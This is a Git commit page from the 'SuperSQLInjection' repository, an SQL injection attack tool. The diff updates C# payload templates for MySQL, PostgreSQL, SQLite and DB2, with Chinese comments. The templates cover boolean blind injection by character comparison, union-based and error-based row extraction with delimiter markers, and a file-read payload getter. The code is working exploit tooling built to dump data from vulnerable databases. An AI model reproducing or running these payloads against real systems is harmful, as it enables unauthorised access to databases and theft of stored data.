shack2/SuperSQLInjectionV1
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

20190111 V1.0 正式版---

Browse Source 
修复PostgreSQL,盲注部分情况下某些字段作为排序字段会出错,导致无法获取数据的情况。
修复PostgreSQL、SQLite、DB2显错和Union注入获取时,部分数据类型无法转换和存在空值导致无法获取的情况。
修复日志处,复制payload报错问题。
This commit is contained in:
shack2
2019-01-10 22:27:46 +08:00
parent 57f795161b
commit 9f8c062123
13 changed files with 296 additions and 149 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2
SuperSQLInjection/payload/DB2.cs
View File

@@ -46,7 +46,7 @@ namespace SuperSQLInjection.payload
//bool方式获取值
public static String bool_value = " ascii(substr({data},{index},1))>{len}";
public static String cast_value = "rtrim(cast({data} as char(254)))";
public static String cast_value = "coalesce(rtrim(cast({data} as char(254))),chr(32))";
//获取行数据
public static String data_value = "(select "+ cast_value + " from (select {allcolumns},rownumber() over() rownum from {dbname}.{table}) t where t.rownum={index})";

8
SuperSQLInjection/payload/MySQL.cs
View File

@@ -63,8 +63,8 @@ namespace SuperSQLInjection.payload
//获取行数据bool
public static String data_value = "(select {columns} from `{dbname}`.`{table}` limit {index},1)";
//获取数据bool,加入orderby解决获取数据时获取到的数据每一行可能不对称的可能
public static String data_value_orderBy = "(select {columns} from `{dbname}`.`{table}` order by {orderby} limit {index},1)";
//获取数据bool,加入orderby解决盲注获取数据时,获取到的数据每一行可能不对称的可能
public static String bool_data_value = "(select {column} from (select {columns} from `{dbname}`.`{table}` limit {index},1)tmp)";
//union获取数据条数
public static String data_count = "(select count(*) from `{dbname}`.`{table}`)";
@@ -363,9 +363,9 @@ namespace SuperSQLInjection.payload
}
public static String getBoolDataPayLoad(String column, String orderBy, String dbName, String table, int index)
public static String getBoolDataPayLoad(String column,List<String> columns, String dbName, String table, int index)
{
String data = data_value_orderBy.Replace("{columns}", column).Replace("{orderby}", orderBy).Replace("{dbname}", dbName).Replace("{table}", table).Replace("{index}", index + "");
String data = bool_data_value.Replace("{column}", column).Replace("{columns}", String.Join(",",columns)).Replace("{dbname}", dbName).Replace("{table}", table).Replace("{index}", index + "");
return data;
}
/// <summary>

28
SuperSQLInjection/payload/PostgreSQL.cs
View File

@@ -30,7 +30,6 @@ namespace SuperSQLInjection.payload
public static String bool_length = "char_length(cast({data} as text))";
public static String bool_value = "ascii(substring(cast({data} as text),{index},1))";
@@ -38,6 +37,8 @@ namespace SuperSQLInjection.payload
public static String substr_one_value = "(substring(cast({data} as text),{index},1))";
public static String substr_nocast = "(substring({data},{index},1))";
//获取数据库数量bool方式
public static String bool_db_count = " " + dbs_count + ">{len}";
@@ -56,6 +57,7 @@ namespace SuperSQLInjection.payload
//bool方式获取值
public static String ver_value = " "+ bool_value + ">{len}";
//bool方式获取值
public static String char_length_val = " " + char_length + ">{len}";
@@ -66,8 +68,8 @@ namespace SuperSQLInjection.payload
//获取行数据bool
public static String data_value = "(select {columns} from {dbname}.{table} offset {index} limit 1)";
//获取数据bool,加入orderby解决获取数据时获取到的数据每一行可能不对称的可能
public static String data_value_orderBy = "(select {columns} from {dbname}.{table} order by {orderby} offset {index} limit 1)";
//获取数据bool,利用子查询,防止数据每一行可能存在不对称的可能
public static String data_value_order = "(select {column} from (select {columns} from {dbname}.{table} offset {index} limit 1)tmp)";
//union获取数据条数
public static String data_count = "(select count(*) from {dbname}.{table})";
@@ -128,11 +130,23 @@ namespace SuperSQLInjection.payload
/// <param name="index">第几行数据1开始</param>
public static String getErrorDataValue(String dbname, String table, int index, List<String> columns)
{
String data = data_value.Replace("{columns}", Comm.unionColumns(columns, "||chr(36)||chr(36)||chr(36)||"));
String data = data_value.Replace("{columns}", unionColumns(columns, "||chr(36)||chr(36)||chr(36)||"));
String d = data.Replace("{dbname}", dbname).Replace("{table}", table).Replace("{index}", index.ToString());
return error_value.Replace("{data}", d);
}
public static String unionColumns(List<String> columns, String unionStr)
{
StringBuilder sb = new StringBuilder();
foreach (String column in columns)
{
sb.Append("coalesce(cast(" + column + " as text),chr(32))" + unionStr);
}
sb.Remove(sb.Length - unionStr.Length, unionStr.Length);
return sb.ToString();
}
public static String getReadFilePayload(String path)
{
return readFile.Replace("{path}", path);
@@ -169,7 +183,7 @@ namespace SuperSQLInjection.payload
public static String getUnionDataValue(int columnsLen, int showIndex, List<String> columns, String dbname, String table, String index)
{
StringBuilder sb = new StringBuilder();
String data = "chr(94)||chr(94)||chr(33)||" + Comm.unionColumns(columns, "||chr(36)||chr(36)||chr(36)||") + "||chr(33)||chr(94)||chr(94)";
String data = "chr(94)||chr(94)||chr(33)||" + unionColumns(columns, "||chr(36)||chr(36)||chr(36)||") + "||chr(33)||chr(94)||chr(94)";
for (int i = 1; i <= columnsLen; i++)
{
if (i == showIndex)
@@ -201,9 +215,9 @@ namespace SuperSQLInjection.payload
}
public static String getBoolDataPayLoad(String column, String orderBy, String dbName, String table, int index)
public static String getBoolDataPayLoad(String column, List<String> columns, String dbName, String table, int index)
{
String data = data_value_orderBy.Replace("{columns}", column).Replace("{orderby}", orderBy).Replace("{dbname}", dbName).Replace("{table}", table).Replace("{index}", index + "");
String data = data_value_order.Replace("{column}", column).Replace("{columns}", String.Join(",", columns)).Replace("{dbname}", dbName).Replace("{table}", table).Replace("{index}", index + "");
return data;
}

18
SuperSQLInjection/payload/SQLite.cs
View File

@@ -52,12 +52,12 @@ namespace SuperSQLInjection.payload
public static String getUnionDataValue(int columnsLen, int showIndex, String Fill, List<String> columns, String table, String index)
{
StringBuilder sb = new StringBuilder();
String data = "char(94)||char(94)||char(33)||" + Comm.unionColumns(columns, "||char(36)||char(36)||char(36)||") + "||char(33)||char(94)||char(94)";
String data = "char(94)||char(94)||char(33)||" + unionColumns(columns, "||char(36)||char(36)||char(36)||") + "||char(33)||char(94)||char(94)";
for (int i = 1; i <= columnsLen; i++)
{
if (i == showIndex)
{
sb.Append(data_value.Replace("{data}", data).Replace("{allcolumns}", Comm.unionColumns(columns, ",")).Replace("{table}", table).Replace("{index}", index));
sb.Append(data_value.Replace("{data}", data).Replace("{allcolumns}", unionColumns(columns, ",")).Replace("{table}", table).Replace("{index}", index));
sb.Append(",");
}
else
@@ -69,6 +69,18 @@ namespace SuperSQLInjection.payload
return union_value.Replace("{data}", sb.ToString());
}
public static String unionColumns(List<String> columns, String unionStr)
{
StringBuilder sb = new StringBuilder();
foreach (String column in columns)
{
sb.Append("coalesce("+column+",char(32))"+unionStr);
}
sb.Remove(sb.Length - unionStr.Length, unionStr.Length);
return sb.ToString();
}
public static String getUnionDataValue(int columnsLen, int showIndex, String Fill, String dataPayLoad)
{
StringBuilder sb = new StringBuilder();
@@ -88,7 +100,7 @@ namespace SuperSQLInjection.payload
}
public static String getBoolDataPayLoad(String column, List<String> columns, String dbName, String table, int index)
{
String data = data_value.Replace("{data}", column).Replace("{allcolumns}", Comm.unionColumns(columns, ",")).Replace("{orderby}", columns[0]);
String data = data_value.Replace("{data}", column).Replace("{allcolumns}", unionColumns(columns, ",")).Replace("{orderby}", columns[0]);
String payload = data.Replace("{dbname}", dbName).Replace("{table}", table).Replace("{data}", column).Replace("{index}", index.ToString());
return payload;
}